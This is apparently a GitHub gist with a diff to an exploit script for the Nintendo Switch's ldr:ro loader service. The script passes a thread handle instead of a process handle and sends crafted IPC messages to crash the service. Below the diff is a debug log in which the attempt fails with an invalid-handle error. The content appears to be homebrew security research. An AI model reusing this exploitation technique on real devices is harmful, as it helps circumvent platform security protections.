-
-
Save roblabla/c33c5024a6d905799f0b2a5f1fc0f1b6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/usefulscripts/dumpModules.js b/usefulscripts/dumpModules.js | |
| index a382369..d0edbdf 100644 | |
| --- a/usefulscripts/dumpModules.js | |
| +++ b/usefulscripts/dumpModules.js | |
| @@ -67,7 +67,7 @@ function dumpModule(module, loader, name) { | |
| utils.log("stage1, getting webkit ldr:ro handle"); | |
| //We are reusing WebKit's ldr:ro session | |
| -var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x955558); | |
| +var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x95D1E8); | |
| //utils.log('ldr:ro management str base ptr is: ' + utils.paddr(ldrro_mng_ptr)); | |
| var ldrro_mng = sc.read8(ldrro_mng_ptr); | |
| //utils.log('ldr:ro management str base is: ' + utils.paddr(ldrro_mng)); | |
| @@ -85,15 +85,16 @@ var nroSize = 0x1000; | |
| var bssSize = 0x900; | |
| //We initialize with a Thread Handle, 0xffff8000 instead of current process handle, 0xffff8001 | |
| -sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).sendTo(ldrro); | |
| +sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).showPacked().sendTo(ldrro).assertOk(); | |
| //We setup a fake nrr loading sequence | |
| -sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().sendTo(ldrro); | |
| +utils.log(" Trying loadnrr"); | |
| +sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro).assertOk(); | |
| utils.log("stage3, crashing ldr:ro"); | |
| //Just calling a normal cmd0 will crash since it will call svcMapProcessCodeMemory during LoadNro sequence using a | |
| //thread handle, attempting a process handle. This happens because svcGetProcessInfo in ldr:ro initialize can also take up | |
| //a Thread Handle as an argument, while svcMapProcessCodeMemory will bug out on it | |
| -var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().sendTo(ldrro); | |
| +var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().showPacked().sendTo(ldrro).assertOk(); | |
| //Those are useless so better free them now | |
| sc.free(nrobase); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| stage1, getting webkit ldr:ro handle | |
| stage2, connecting to ldr:ro | |
| ipcm+0x0 | 04 00 00 00 0a 00 00 80 03 00 00 00 00 00 00 00 | ................ | | |
| ipcm+0x10 | 00 00 00 00 00 80 ff ff 00 00 00 00 00 00 00 00 | ................ | | |
| ipcm+0x20 | 53 46 43 49 00 00 00 00 04 00 00 00 00 00 00 00 | SFCI............ | | |
| ipcm+0x30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ | | |
| Trying loadnrr | |
| ipcm+0x0 | 04 00 00 00 0e 00 00 80 01 00 00 00 00 00 00 00 | ................ | | |
| ipcm+0x10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ | | |
| ipcm+0x20 | 53 46 43 49 00 00 00 00 02 00 00 00 00 00 00 00 | SFCI............ | | |
| ipcm+0x30 | 00 00 00 00 00 00 00 00 00 40 53 23 0b 00 00 00 | .........@S#.... | | |
| ipcm+0x40 | 00 10 00 00 00 00 00 00 00 00 00 00 | ............ | | |
| IPC message: | |
| - Command ID / Result code: Error: 0xe401 (Invalid handle. in module Kernel) | |
| ERR [826]: 0xe401 (Invalid handle. in module Kernel) | |
| ResultCode@exploit/ResultCode.js:15:0 | |
| assertOk@exploit/ipc.js:555:0 | |
| eval code |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment